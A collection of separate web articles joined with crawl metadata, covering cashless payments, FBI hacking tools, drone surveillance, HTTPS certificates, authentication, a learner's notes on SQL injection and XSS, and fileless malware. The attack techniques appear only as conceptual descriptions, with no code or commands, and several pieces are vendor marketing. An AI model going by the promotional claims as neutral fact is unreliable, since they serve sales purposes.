As things stand, a cashless UK would exclude a large number of people.
So, what are the greatest barriers to the UK’s cashless society and how can they best be tackled?
Who relies on cash?
With almost 500 UK cash machines being removed from service each month, cash is getting harder to find. Disadvantaged groups are more likely to rely on cash and some, such as those who do not have a bank account, have little choice but to use cash for everything. In 2017, people in the UK made more than 13 billion cash payments1.The choice seems clear: either ensure the continued availability of cash or make it easy for all members of society to go cashless.
Other countries have tackled this. For instance, Sweden has positioned itself as the front-runner to becoming a truly cashless society. In fact, four out of five purchases in Sweden are made electronically, and Sweden’s central bank, Riksbanken, estimates that between 2012 and 2020, cash in circulation will have declined by 20–50 per cent. What can the UK learn from Sweden? Although Sweden experienced similar reservations to the notion of a transformation into a fully cashless nation from certain groups that are dependent on traditional currency, Riksbanken also emphasised that the answer lies in making sure that cash services are still provided. This would suggest that the ideal payment balance lies in offering people freedom, even if physical currency becomes rarer.
Furthermore, the Indian government has pushed the cashless agenda to tackle corruption and crime, and to draw in millions who currently live at the margins of society. One element of this is Aadhaar, a digital identity/authentication that relies on fingerprint biometrics. When linked with bank accounts or other methods, Aadhaar lets users authenticate payments, regardless of their literacy, income or access to formal banking.
A similar use of fingerprint biometric payment smart cards could overcome several of the problems we see in the UK. For example the fool-proof authentication built into biometric pre-paid cards could help those currently unbanked to build a credit rating, and gain access to products and services previously beyond reach.
When asked why they use cash at all, UK residents give a range of answers. These include convenience, trust and choice issues1. People like having a choice of payment and for that reason (as well as several others) the complete demise of all physical currency in the UK is still several years away. Even those who are happy to use cashless payments like to have cash as a back-up, while those who generally favour other forms of digital payment (PayPal, mobile wallets, etc.) have cards for the same reason.
Ensuring trust in card payments is very important for consumers, banks and merchants alike. As such, where cash payments are currently preferred for convenience, the obvious response is to make card payments as easy and trusted as possible.
Where trust is a problem, this is often because consumers don’t trust banks, the internet or the infrastructure needed to make cashless payments work1. This has a certain situational irony, because cashless payments are actually far more traceable than cash. Yet some consumers remain wary: they need to be reassured that card payments are secure.
Here, biometrics are useful once more. While a signature can be forged and an online account hacked, a fingerprint is virtually impossible to replicate. What is more, consumers are used to seeing biometrics used in places where security is paramount, such as airports; they trust biometrics as a gold standard.
Cards with built-in biometric authentication help customers to overcome trust issues around digital payment. They are also, therefore, likely to help financial organisations who wish to draw in the sceptical consumer by reassuring them.
The Access to Cash review concludes that cash is unlikely to disappear from the UK completely, and that there are important reasons to keep it in circulation. However, it seems reasonable, given recent trends, to believe the use of cash will continue to fall and the use of alternatives, specifically payment cards, will rise.
It seems likely that the UK will ultimately become mostly, as opposed to completely, cashless, but preparation is key and the transition must be well supported. Rural areas must be sure they are able to access electronic money transactions, for example.
Fingerprint biometric smart cards are safer and more accessible, allowing even those without formal banking identities to make cashless payments securely and reassuring the most nervous banking clients. After all, many UK schools already give pupils (who are of course, largely ‘unbanked’) biometric cards with which to pay for their school lunches — it looks as though that’s a lesson we could all do with learning.
|
<urn:uuid:6a79d9b8-2c16-4f30-90e9-60b3822e5391>
|
CC-MAIN-2022-40
|
https://informationsecuritybuzz.com/articles/what-are-the-barriers-to-a-cashless-uk/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00446.warc.gz
|
en
| 0.965122 | 1,181 | 2.609375 | 3 |
In a recent Wired.com expose’, they expose how the FBI has been secretly hacking civilian computers for about 20 years, but thanks to Rule 41, their ability to hack has been expanded.
Nevertheless, effective record keeping for these hacking incidents doesn’t exist. For instance, search warrants that permit hacking are issued using elusive language, and this makes it difficult to keep track of when the feds hack.
Also, it’s not required for the FBI to submit any reports to Congress that track the FBI’s court-sanctioned hacking incidents—which the FBI would rather term “remote access searches.”
So how do we know this then? Because every so often, bits of information are revealed in news stories and court cases.
- Carnivore, a traffic sniffer, is the FBI’s first known remote access tool that Internet Service Providers allowed to get installed on network backbones in 1998.
- This plan got out in 2000 when EarthLink wouldn’t let the FBI install Carnivore on its network.
- A court case followed, and the name “Carnivore” certainly didn’t help the feds’ case.
- Come 2005, Carnivore was replaced with commercial filters.
The FBI had an issue with encrypted data that it was taking. Thanks to the advent of keyloggers, this problem was solved, as the keylogger records keystrokes, capturing them before the encryption software does its job.
The Scarfo Case
- In 1999 a government keystroke logger targeted Nicodemo Salvatore Scarfo, Jr., a mob boss who used encryption.
- The remotely installed keylogger had not yet been developed at this time, so the FBI had to break into Scarfo’s office to install the keylogger on his computer, then break in again to retrieve it.
- Scarfo argued that the FBI should have had a wiretap order, not just a search warrant, to do this.
- The government, though, replied that the keylogger technology was classified.
- The Scarfo case inspired the FBI to design custom hacking tools: enter Magic Lantern, a remotely installable keylogger that arrived in 2001.
- This keylogger also could track browsing history, passwords and usernames.
- It’s not known when the first time was that Magic Lantern was used.
|
<urn:uuid:8affd0a0-357f-4328-8d85-0ad8e4aac003>
|
CC-MAIN-2022-40
|
https://globalriskcommunity.com/profiles/blogs/how-the-fbi-hacks-you?context=tag-hacking
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00446.warc.gz
|
en
| 0.946559 | 513 | 2.5625 | 3 |
Privacy in the Era of Drones and Aerial Surveillance
Unmanned Aerial Vehicles (UAVs) or Drones have flown into our lives both as commercial and military hardware and for the consumer hobbyist. Drones are really useful, hence the massive market for the devices and the enormous demand for the products. The possibilities for drones in an industrial setting are vast: industrial monitoring; aerial surveillance; aerial photography that, linked to AI, provides a machine vision; even smart agriculture flies on the back of drones. And who doesn’t want a drone, just for the fun of it?
Today unmanned aircrafts carrying cameras have become very affordable and accessible to the general public, raising a new avenue for aerial surveillance for day to day American lives.
What Can Drones Do?
Unmanned aerial vehicles (UAVs), usually referred to as “drones,” have proved surprisingly versatile in their short history. Among other applications, Drones are used for building inspection, firefighting, journalism, conservation, agriculture, aid distribution, archaeology, military missions, and law enforcement.
Drones are really remarkable devices. They can float in midair, do backflips and spins; they can travel effortlessly and precisely across narrow spaces or in tandem with other drones, and they can do all this while holding items like a stabilized video camera and a multitude of other technology on board. The extent of their flexibility is what makes them a viable choice for a range of different tasks. Drones can be used as weapons in distant wars, or they can help to re-invent the way humanitarian aid is delivered. Drones may help advance science study, or they can do tracking, monitoring, and surveillance work.
Drones are often referred to as a suitable alternative to manned flights, primarily due to their versatility and unique capabilities. Drones can be a continuous, highly focused, and low-cost method of surveillance. These can be deployed on-demand and can usually stay longer in the air than the manned aircraft. They are versatile in terms of the tasks they can perform, they can accommodate high-resolution images and sensors, and the “plug and play” payload flexibility makes them easy to customize to a particular flight purpose. They can also cover vast and remote areas. Some of the latest surveillance technologies that can be applied to drones include:
- High-power zoom lenses that could improve the likelihood of individuals being observed from a distance;
- Night vision, ultraviolet, infrared thermal imaging, and LIDAR (light detection and range) enabling the UAVs to detect and enhance detail;
- Radar technology systems that can penetrate walls and soil, allowing individuals to be monitored within houses, through cloudy environments, and foliage;
- Video analytics technology which is evolving rapidly and will be able to recognize and react to individual persons, events, and objects, or even flag changes in routines to detect particular patterns of activity as “suspicious.” It may also involve items like license plate readers.
- Distributed footage where a variety of UAVs operate in tandem with several video cameras;
- Facial recognition or other “simple biometric recognition” that allows the UAV to recognize and monitor personal attributes such as height, age, gender, and skin color.
According to a report released by the Pentagon, the use of drones for aerial surveillance by the Department of Defense had reached its all-time high in American history. Traditionally armed drones have been known to be used abroad in war zones like Syria, Yemen, Somalia, Iraq, and Afghanistan to launch counter-offensive attacks on the terrorist groups and other militia groups in those regions. Domestically the department of defense has been using drone surveillance to help in firefighting, in Operations supporting domestic Department of Defense facilities and military bases within. The DoD has also utilized drone surveillance in supporting civil authorities at the southern border, in supporting civil authorities in hurricane/flood response, in civil law enforcement, counter-drug, and terrorism.
The use of drones in aerial surveillance is seen as a move that could potentially revolutionize traffic accident reconstruction procedures. Drone aerial surveillance has also been very important in traffic management, telecommunication (creation of temporary network) farming, and many other uses still on trial phases.
What Is the Problem With Drone Surveillance?
Concerns about both private and state use of drones in surveillance are being raised by civil rights and liberties groups such as the Electronic Frontier Foundation (EFF). Such groups and others are calling for tighter controls on the use of drones to protect the right to privacy of individuals. The U.S. drone regulations established by the Federal Aviation Administration (FAA) is similar on a state by state basis, to the data protection laws in the U.S. Several other countries are also addressing the use of drones and have guidelines on privacy rights in legislation. Yet this is a moving target (pun intended), and keeping laws up to date with technology is also a challenge.
The information that drones gather, especially when used by governments or law enforcement, can be tremendously sensitive and drones may provide a backdoor for hackers to access vast amounts of data stored not only on that particular device – but also on a central server to which it is connected.
There is a huge question as to whether current laws that exist across the globe in different jurisdictions can adequately protect ordinary people from the privacy threats presented by drone technology.
Invasive Aerial Surveillance Can Identify You
With its capacity for accurate zooming at short distances, aerial surveillance, combined with other automated identification technologies, will allow the easy cataloging of individuals and their activities. There are two major automated identification technologies that could enable easy identification from vast distances: automatic license plate readers and facial recognition technology. These technologies are now commonly used by government agencies. U.S. Immigration and Customs Enforcement operate a national network of electronic license plate readers to track people, and the FBI also operates a 50 percent U.S. adult facial recognition database and enables law enforcement authorities from hundreds of states to use it.
This means that the government could track sensitive activities and catalog individuals. Any person attending or leaving a political meeting, a union meeting, or a lawyer’s office may be recognized and cataloged. A drone could zoom in and check all the cars parked outside a medical center or church, and make a list of attendees in seconds without any human effort. Such concerns are not speculated. Study efforts by the American Civil Liberties Union revealed the fact that the FBI was using aerial surveillance to monitor protesters’ actions in Baltimore. Vendors selling drones to police departments stress their ability to pick individuals from public events, such as a political rally, as a benefit, not a source of potential abuse.
Censoring Discriminatory Surveillance Through Redaction
Drone and aerial surveillance, if put to good use, has tremendous benefits, but we cannot dispute the fact that it is prone to user violations and susceptibility. Take, for example, when police use it in crowd monitoring, if faces are blurred, for instance, through automated video redaction, then one will focus more on suspect behavior, thus avoiding discriminatory targeting. Privacy protection filters can be applied to body silhouettes and cars. In this way, faces, license plates, and accessories will all be filtered at the same time.
For example, celebrities are besieged by paparazzi drones, which have become a permanent fixture in their neighborhoods. This can lead to a menace to showbiz firms associated with releasing such images without properly redacting parts with minors, among other sensitive and personally identifiable data from such videos before posting online. This can be sorted by application and use of redaction services such as the one provided by CaseGuard Studio. It is imperative and necessary to quickly engage video reduction software for drones that can sensor images in real-time to go hand in hand with domestic drone protection laws.
For any new technology, we need to build it with privacy and protection in mind. Yet, like other innovations, these two roles are often forgotten in the race to the market required to succeed in a very competitive world.
Legislation is underway to monitor security issues that may impact drones during manufacturing. Nonetheless, this is not something that legislation alone can solve, particularly in a fast-paced technology environment. Drone users must ensure that all specific safety requirements are met. This involves the use of robust video redaction software. Other areas, like encryption, password hygiene, and firmware updates, should be part of the general ownership routine that a responsible drone owner performs.
Therefore, through proper deployment and utilization of video redaction software, drones will not be viewed as a problem that needs to be addressed but rather an opportunity that should be embraced. But this can only happen if the privacy of the citizens is guaranteed, and this can only happen through the use of video redaction in minimizing the negative effects of drone surveillance on the private lives of the public.
|
<urn:uuid:96c1d886-d098-4884-bf04-28f43f1325ff>
|
CC-MAIN-2022-40
|
https://caseguard.com/articles/privacy-in-the-era-of-drones-and-aerial-surveillance/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00446.warc.gz
|
en
| 0.942527 | 1,818 | 3.109375 | 3 |
What’s the latest with HTTPS and SSL/TLS Certificates?
We’ve written quite a lot in past FYI Blog posts about SSL/TLS certificates, the critical building block to secure communication on the Internet. We described what such certificates were, their use in securing the communications channel between a client (browser) and a server, different types of certificates and the pros and cons of using each.
Given the changes in the Internet landscape over the past five years, we feel it is time to revisit these topics. The technical details described in the earlier posts remain unchanged. What has changed, though, are the traffic patterns for HTTPS-based communications, additional vulnerabilities arising as a consequence and ways to mitigate these. This post will provide a general overview of certain changes in the Internet landscape over the past few years, while subsequent blog posts will describe some of the topics identified here in greater detail.
There has been a growing movement to strive for encrypting all communications on the Web, not just those that require user credentials for access to content and services. As early as 2014, Google converted access to its own services (Gmail, Search, etc.) over HTTPS only, and announced that it would make use of HTTPS as an input in its search ranking algorithm (as a minor factor, initially, but broadly hinting at a greater role in future). Google’s stated motives were to “make the Internet safer more broadly”, which is plausible as most people access content via a Google search. Increasingly, popular sites such as Facebook and Twitter also took up this cause, leading to the steady penetration of HTTPS-by-default access. The initial cynicism from ISPs and other intermediaries on this trend, based on the belief that such a move was self-serving rather than altruistic as it allows these large players to hide valuable analytics data on user behavior, was overtaken by the Snowden leak and other high profile revelations of pervasive surveillance of end-to-end communications which helped get the public, both in the US and abroad, generally supportive of the all-encrypted Web program.
Google and other major industry players further greased the path towards fully encrypted communications by standardizing the next generation of HTTP, called HTTP/2, which removes major performance inefficiencies identified with HTTP over the years. While HTTP/2 does not require TLS, all browser vendors have chosen to implement HTTP/2 with mandatory TLS usage so that web sites that wish to provide the performance advantages offered by the new protocol must use TLS by default. Growth of HTTP/2 enabled sites show an upward trajectory, currently at about 15.5% including most of the popular web sites.
Thus, by early 2017, the Electronic Frontier Foundation (EFF) has been able to report that half of the Web’s traffic is now encrypted. EFF cites data from major browser vendors (Firefox, Chrome) which show that ~50% of web pages loaded using such browsers are now protected by HTTPS. There is one reason for this startling growth in the preceding three years. Larger players have, of course, the resources needed to make the necessary changes to their backend to make HTTPS the default, while smaller players have been helped by organizations such as the EFF and the Internet Security Research Group (ISRG) which provide tools and best practices to help web masters make the necessary conversions. The ISRG, in particular, created Lets Encrypt, an open and automated Certificate Authority (CA) which allows anyone to easily obtain a Domain Validated (DV) certificate – for free! This last point removes one major excuse for small web sites, so that the cost argument can no longer be used to not get on board with the program. In fact, the growth of Lets Encrypt certificates has been phenomenal, making it comparable (depending on how one counts the issued/active certificates) to those of the industry giants which, however, also offer more robust forms (Extended Validation(EV), Organization Validation (OV)) of certificates. However, the proliferation of such easily obtainable DV certificates adds an additional level of vulnerability that we shall discuss later in this post.
But what about the other 50% of the surveyed Internet that comprise servers which do not support HTTPS? Very few web sites are self contained and provide all the necessary content to the end user. It is quite common for a single page request to require access to other third-party servers to pull in images, scripts, and, most important, advertisements. Thus, even if the initial page requested is over HTTPS, the other connections to retrieve external content that populate the page might not be. A correctly configured browser will penalize such sites and mark them a non-secure, or refuse to download additional content from external unsecured servers. With cost no longer an excuse, the main reason for not migrating to HTTPS, beyond laziness, is the requirement to ensure that all of a site’s content is delivered via HTTPS. This requires a site’s content manager to work with partners hosting additional content to ensure that those partner sites also deploy HTTPS. This manual process, often time-consuming, is one reason for the slow uptake by the other half. These are often small to medium-sized sites with less traffic and fewer resources to spare for such a migration in the near term. (As an aside, such sites are also the sort that primarily benefit from a simple and free DV certificate.)
Returning now to the proliferation of free DV certificates, it is important to remember that this type of certificate requires minimal checks on the part of the issuer (the CA) of the organization requesting the certificate, with no warranties provided against misrepresentation to those who rely on such certificates. (Indeed, all that is required to obtain a Let’s Encrypt DV certificate is proof that the requesting organization “owns” the domain, which can be shown by either provisioning a DNS record for the domain in question or showing the ability, at the time of requesting the certificate, to add a given HTTP resource under that domain name.)
It is worth recalling that a properly signed server’s DV certificate presented during the initial SSL/TLS handshake only asserts that the given public key belongs to the specific domain, and that this binding is valid for a given time period. It says nothing about the organization which hosts or owns the domain name. While the cryptographic techniques used by HTTPS to set up a secure connection with a site can detect forged or fake certificates used when trying to secure the connection, it is not possible to detect perfectly valid certificates issued to fake organizations or those issued by a compromised CA. An example of this is the alarming number of Lets Encrypt DV certificates issued to domains containing the word “paypal”. (Paypal appears to be most phishers’ go-to choice, but other popular domains are also a target.) Such certificates pass all the necessary cryptographic checks, and a browser will display the reassuring green lock icon when displaying a rogue page which has been formatted to resemble the Paypal portal. Very few users would look under the hood for the site’s certificate and run some checks. To deny the charge of laziness for not doing more to prevent such malicious domains from obtaining certificates, Lets Encrypt has offered a rationale for its copious provisioning of DV certificates, arguing for the importance of meeting its stated objective of ensuring greater penetration of HTTPS and noting the complexities of monitoring site content and ownership, which, it believes, a CA is ill equipped to do.
To be fair, other and well-known CA providers have also unintentionally provided certificates to malicious sites. We recently wrote a post about Google reducing its trust in certificates issued by Symantec and its subsidiaries. And these include EV certificates too, which require a much more rigorous level of verification of the requesting organization before such certificates are issued! As we pointed out in that post, the entire system of encrypted communications on the Web is dependent on the trust we place on the CAs. If the CA’s certificate issuing processes are compromised, the end user lives in a fool’s paradise where green lock icons are always indicative of safety.
What then can be done to restore that trust in the SSL/TLS certificate ecosystem that is so essential in this world of ever growing HTTPS Everywhere?
Quis custodiet ipsos custodes?
Who will guard the guardians themselves?
That question is as pertinent to us in this new world of HTTPS Everywhere and compromised (or, as some might suggest, lazy) CAs as it was in Juvenal’s times.
A key concern with the circulation of cryptographically valid certificates issued by a compromised CA is the length of time it takes for this information to circulate and for the certificates to be revoked and placed on blacklists. Our post on the Google-Symantec altercation describes how this matter dragged on for 3 years before the current resolution. One way of improving the timeliness of discovery of mis-issued certificates is an experimental proposal by Google called Certificate Transparency, which they have implemented and which has since been placed on the path to becoming an Internet Standard via the open, consensus-based input process of the Internet Engineering Task Force (IETF), the technical forum that creates standards (such as HTTP, TLS, etc.) for use on the Internet. Google has since created an eponymous organization and open source project to promote the implementation of Certificate Transparency.
The details of how Certificate Transparency works is complex, and we shall devote a future post to describing it in greater depth and what changes it imposes on the SSL/TLS ecosystem – the CAs, browsers and other involved (some new) parties. However, until then, a brief description of the overall architecture for Certificate Transparency (CT) follows.
In essence, Certificate Transparency works by having each CA publish its newly registered certificates to a publicly visible and auditable log. Any party, especially one whose domain name is apt to be spoofed, can study these logs and verify if any issued certificate uses the domain name (or parts thereof) without authorization. Such transparency is expected to lead to quicker mitigation of the harmful effects of mis-issued certificates, such as rapid updates of revocation lists. The normal resolution processes already in place are not changed –but the time lag to realize the error and take action is considerably shortened, ideally to hours instead of days, weeks or months. One can expect new business entities to arise, which, as a service, can monitor such logs on behalf of paying customers for unauthorized certificates mis-issued for a domain.
The critical component in the system, therefore, is the log; so much of the technical work is devoted to its structure and ensuring that its data remains cryptographically assured as entries are appended so that the log cannot be retroactively manipulated. Another entity, called an auditor, can verify if a log has corrupted data and also query whether a particular certificate has been logged. If the latter proves negative, this can be an indication that the certificate is fraudulent as all newly-issued certificates should – if this system is to work as intended – be logged.
From a client’s point of view, an additional parameter, obtained during the logging process, is included in the TLS handshake that allows it to verify that the offered certificate was added to the log at a certain time and was indeed issued for that particular certificate.
As you can see, the devil’s in the details, which requires a dedicated post to more fully explain the nitty-gritty as well as nuances of the solution.
To go back to the quotation that heads this section, Certificate Transparency provides at least one mechanism for oversight over the actions of the CAs, the guardians of the trust system that underlies the entire certificate ecosystem. Over time, it is hoped that its use will become commonplace and become a well-controlled and audited additional tool in the security infrastructure that so critically underpins the functioning of the web.
Note that HTTPS-based communications allows intermediaries (such as your ISP) to only know which domain (and IP address) was visited, and not much else beyond that. ISPs can do deep packet inspection of unencrypted channels to provide “value-added” services, from their perspective.
Some show the words “Secure”. We shall write a future post on the ways different browsers make the results of the certificate check visible.
|
<urn:uuid:2054c7d2-cddd-4b5c-b156-eaf4c5022c0f>
|
CC-MAIN-2022-40
|
https://luxsci.com/blog/whats-latest-https-ssltls-certificates.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00446.warc.gz
|
en
| 0.943577 | 2,542 | 2.671875 | 3 |
Multi-Factor Authentication (MFA) is an electronic authentication method that gives users access to a website, application, or a VPN after successfully providing two or more verification factors. Utilizing multiple verification factors reduces the likelihood of a cybersecurity attack. Although Multi-Factor Authentication is highly recommended whenever it is available, it isn’t faultless. An improvement on these security methods is supposedly in the works. Continue reading to learn more about possible developments on the horizon.
Multi-Factor Authentication (MFA) Has its Issues
By providing additional authentication factors prior to accessing an account or various applications, it is clear that the account or application is made to be much more secure. However, there may be too many hurdles or obstacles that the members of your team may have to go through, which can result in employees becoming bothered, leading to decreased engagement.
In addition, the most commonly used mode of Multi-Factor Authentication is the use of a generated code provided through a smartphone. By doing so, this requires everyone to have their cell phones with them and ready at all times. Unfortunately, situations can occur and people may have either forgotten their phone, the cell phone battery dies, or their phone might have been broken. This makes the use of Multi-Factor Authentication (MFA) not as practical as one had hoped.
It is obvious that there are many security benefits of Multi-Factor Authentication but there are added stresses that also come with it.
Adaptive Authentication Can Reduce This Stress
Some organizations have begun utilizing a new approach called adaptive authentication. Instead of having to provide multiple forms of verification as a means of authentication, adaptive authentication collects various kinds of data, mostly based on the user’s behavior. Majority of the time, the processes in a work day are regular and consistent. Users come up with a specific way of typing and utilizing the mouse and/or trackpad. Adaptive authentication analyzes a user’s patterns of behavior to determine whether or not the user is who he or she is claiming to be. Adaptive authentication then creates this profile to compare a user’s behavior and provides access when everything matches.
If an action is seen as out of the ordinary, a multi-factor will be issued. For example, if an unusual device is attempting to gain access to someone’s data from a new place at a different time, a multi-factor is then requested. If everything checks out, users will be able to access whatever they need without any difficulty.
By having a balance of security with convenience, this idea of adaptive authentication is ideal for most people. This method has been adopted by many companies in various industries. Although it may not yet be available to small- or medium-sized businesses, it is definitely something to keep in mind for the future.
At AE Technology Group, we are always striving to help you and your business maintain a sense of security within your business operations, in hopes to improve the overall productivity and efficiency of your company. For any questions or to learn more about adaptive authentication, give us a call today at 954.474.2204.
|
<urn:uuid:c1e0e185-940b-4ac6-962e-a14ab6be582e>
|
CC-MAIN-2022-40
|
https://www.aetechgroup.com/how-to-improve-mfa-with-the-use-of-adaptive-authentication/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00446.warc.gz
|
en
| 0.955112 | 632 | 3.203125 | 3 |
As organizations and individuals continue to look for ways to ensure the security of digital information and move away from a world of passwords, one option that has been tossed around for several years includes the collection and analysis of specific human body characteristics. Eye retina scans, fingerprints and voice samples are all examples of a type of security system commonly referred to as biometrics.
It is important to note, however, that the use of biometrics is not a new concept. In fact, fingerprints have been in use since about 500 B.C., as Babylonian businessmen first pressed them into clay tablets to record business transactions.
Today, this digital security measurement is useful in some low-level security environments, such as clocking into a job— where convenience and ease of use are the primary drivers. In this regard, today’s technologies are making digital fingerprints useful for rudimentary authentication purposes.
When approached as the end-all, be-all solution for digital security, however, there are a few shortcomings that make biometrics less than ideal. Most notably, if stolen, a person’s identity would be in serious jeopardy.
While digital certificates can be revoked, once a person’s biometrics gets into the hands of a malicious third party, there is no way of getting the information back. You can’t, in other words, revoke someone’s DNA structure. For this reason, some jurisdictions maintain that biometrics be stored in devices controlled by the individual and not agencies or organizations.
Further drawbacks can be found in the difficulty and cost of actually collecting biometric information. Voice verification, for instance, requires little to no background interference to work properly. Facial recognition software mandates that a person match up evenly with a camera for authentication purposes. Additionally, a person’s face will change over time.
The use of biometrics presents an interesting case when it comes to the protection of digital information. Right now, options are readily available for consumers. However, until there is an affordable, secure solution to employing them, adoption will be slow.
What are your thoughts on biometrics? Do you have a comprehensive plan as to how they can be carried out in an effective manner? We would love to hear your thoughts in the comments section below.
|
<urn:uuid:cfaa2a50-e90a-43f6-bfeb-32927c13fe9a>
|
CC-MAIN-2022-40
|
https://www.entrust.com/de/blog/2013/09/are-biometrics-the-answer/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00646.warc.gz
|
en
| 0.934595 | 466 | 3 | 3 |
I have now completed the first course in my queue! Since the last post, I have been digging into website hacking. This is of course a big area and a massive element of day-to-day information security. I went through various avenues and implementations of SQL injection attacks, XSS (Cross Site Scripting) attacks, and more. I also learned about protecting against these sorts of attacks, and had a brief introduction into how vulnerability scanning can be automated with scanning tools. Of course, once you have your scan output ready, put it into Dradis and produce a custom no-fuss report!
Trying out the SQL injection procedures was based on attacking a fake vulnerable web server in Metasploitable. Insecure database calls in SQL on a website or web application can let attackers extract or modify information, or grant access even without passwords. An SQL injection vulnerability on one site can potentially undermine the security of all sites and applications hosted on that one web server. As the instructor said, if there is an SQL injection vulnerability on the target site, bingo, game over, you as an attacker can ultimately do virtually anything you want with that site.
With XSS vulnerabilities, you essentially insert scripts to run from a site. As an example, there may be a commenting feature on a web page with an XSS vulnerability, which means that this XSS script would run for all visitors to that page. What makes this insidious is that the script would run for visitors to the page, as it’s not part of the base web page. An insecure website could therefore jeopardize the security of third parties – and therefore, owners of web pages, web applications, and web hosts have a responsibility to protect their sites so third parties are not affected.
The course closed with a very brief introduction to ZAP (Zed Attack Proxy), one of many tools to automate scanning for vulnerabilities. The point of this course was to show the theory behind security vulnerabilities, and the sort of attacks that can be carried out by hackers. Now that I have been introduced to the nuts-and-bolts, step-by-step methods of attacking devices and applications, the path is open to learning more about particular focus areas and to think about scripting and automation. I do have some more studies coming up to these ends. I intend to learn more about hacking using Android, I need to learn more about networking vulnerabilities, and I would like to learn more about scripting and vulnerability scan automation through software like ZAP and Burp, both of which have official Dradis plugins. I already manipulate their plugin outputs most days when building Dradis templates, so it would be fun to create those outputs as well!
|
<urn:uuid:04bb0a0c-4f20-4a3c-a24f-cb4efc70a23e>
|
CC-MAIN-2022-40
|
https://dradisframework.com/blog/2019/04/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00646.warc.gz
|
en
| 0.957863 | 549 | 2.53125 | 3 |
Fileless malware is a malicious activity that infects a system using built-in legitimate and native programs. In contrast to other malware programs like ransomware, attackers don’t need to install a malicious program in the system to execute an attack, which makes it hard to detect and prevent. A traditional antimalware solution detects malware by matching files against a database of known malicious programs. However, fileless malware payloads reside in the memory only and do not write any files to the hard drive making it difficult for signature-based security solutions to detect it. Thus, cybersecurity experts agree that attackers are ten times more likely to succeed when executing fileless malware attacks than file-based attacks.
The Rising Threats of Fileless Malware
An analysis by Cyber Threat Intelligence (CTI) team at the Multi-State Information Sharing and Analysis Center (MS-ISAC) indicates that fileless malware will cause 50% of cyberattacks targeting complex enterprise IT environments in 2022. The ability of fileless malware to evade detection by traditional security tools has caused it to be a favorite for hackers, with reports showing that fileless-based attacks tripled between February and March 2022.
Moreover, attackers have increased the use of fileless malware attack techniques, also known as living off the land (LotL) techniques, since the malicious scripts hide in computer memory to utilize the installed librari4es, binaries, and legitimate programs to spread infections across the system.
How Fileless Malware Works
Fileless malware provides attackers with two main benefits; it does not write or leave files on the computer memory making it nearly impossible to detect using traditional antivirus programs. The absence of files means nothing for forensics investigators to discover. But how is it delivered to the target computer system?
Since attackers must inject the malware directly into the memory, they first gain access to the target environment using the known methods. For example, they can exploit unpatched vulnerabilities in installed programs or operating systems, and once they have access, they inject the malware directly into the memory of legitimate applications. Also, using stolen credentials gives hackers an easy way of gaining access and injecting malware.
In addition, attackers can inject fileless malware into the target computer’s systems, files, protocols, and applications under the following scenarios:
- Phishing emails: Attackers craft phishing emails to trick employees into visiting malicious sites or downloading harmful software. Although the websites may appear legitimate, clicking a malicious one loads the fileless malware in the computer memory, permitting hackers to load additional harmful codes remotely and exfiltrating sensitive information.
- Native applications: Hackers target native applications, such as Microsoft PowerShell, and inject malicious code remotely. Legitimate programs running malicious scripts are hard to detect using normal antivirus solutions. For example, injecting the malicious code in Microsoft PowerShell permits attackers to run remote malicious scripts as legitimate PowerShell scripts without detection.
- Websites that appear legitimate: Hackers can create websites that seem legitimate but execute malicious scripts once you visit them. For instance, they may exploit vulnerable Flash plugins and inject malicious code into the browser’s memory.
In other words, fileless malware is designed not to write any files to the disk, as is the case with traditional file-based malware. Instead, attackers write fileless malware directly to the random access memory of trusted applications, such that the application is legitimate to a traditional anti-malware program, whereas the malware runs in the background. It also complicates the work of a forensics examiner since it does not leave traces.
Recommended Prevention Measures
The traditional antivirus solutions relied upon by millions of users cannot detect or prevent fileless malware attacks. Therefore, organizations should implement next-generation endpoint detection and response (EDR) solutions. EDR systems rely on continuous, real-time, and AI-based monitoring to detect unusual patterns, such as sudden changes in outgoing/incoming network traffic, unwanted operations in native applications like PowerShell and Windows Management Infrastructure, and phishing emails, among others.
Additionally, fileless malware attacks seek to exploit human vulnerabilities to be successful. Therefore, organizations should analyze and monitor human and system behaviors to ensure a proactive security approach. For example, a managed service provider leverages cutting-edge tools and solutions to monitor your systems 24/7 to detect behaviors that may enable attackers to inject malicious code into the random access memory of installed software programs. Employees and other end-users should also adhere to the following practices:
- Avoid installing or downloading applications from unknown sources
- Ensure all applications have the latest updates and security patches
- Update the web browsers regularly and avoid clicking on malicious sites
- Be on the lookout for phishing emails
Also, identifying and analyzing attack indicators can enable a proactive method for detecting and stopping fileless malware attacks. Indicators of attack don’t focus on the phases of an attack but instead on identifying signs of an attack in progress. In the case of fileless malware attacks, the indicators of attack include signs of lateral movement and local or remote code execution. In addition, since fileless attacks evade detection by traditional antivirus software, indicators of attack examine the sequences, intent, and context to identify and block malicious actions. Lastly, managed threat hunting services enable round-the-clock proactive intrusion detection, IT environment monitoring, and other subtle incidents that go undetected by conventional security tools.
Sentia Can Help Protect Your Organization From Fileless Malware
While traditional firewalls typically provide stateful inspection of incoming and outgoing network traffic, Sentia’s next-generation firewall includes additional features like application awareness and control, integrated intrusion prevention, and cloud-delivered threat intelligence. These are important attributes for flagging unusual traffic resulting from fileless malware attacks. We will design, procure, manage and monitor your entire network, so you can focus on driving business growth and new initiatives. At the same time, our experts leverage advanced monitoring solutions to detect and mitigate fileless malware in your systems. Our enterprise network security offerings include modern enterprise network management for on-premise, cloud, and hybrid environments. Sentia will work with you to design the optimal services to keep your IT infrastructure safe and operational. Contact Sentia today for a free consultation.
|
<urn:uuid:ac52c542-165d-4463-9bff-55d5133cba68>
|
CC-MAIN-2022-40
|
